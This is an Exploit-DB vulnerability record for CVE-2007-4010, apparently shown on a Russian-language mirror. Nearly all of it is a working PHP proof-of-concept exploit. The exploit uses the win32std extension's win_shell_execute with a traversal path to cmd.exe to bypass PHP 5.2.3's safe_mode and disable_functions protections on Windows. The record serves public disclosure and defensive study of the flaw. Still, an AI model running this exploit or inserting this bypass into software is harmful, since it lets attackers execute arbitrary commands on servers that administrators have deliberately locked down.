- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4218
- Проверка EDB
-
- Пройдено
- Автор
- SHINNAI
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2007-4010
- Дата публикации
- 2007-07-24
PHP:
<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//Thanks to rgod for all his precious advises :)
//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be wxecuted
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager
if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>
# milw0rm.com [2007-07-24]
- Источник
- www.exploit-db.com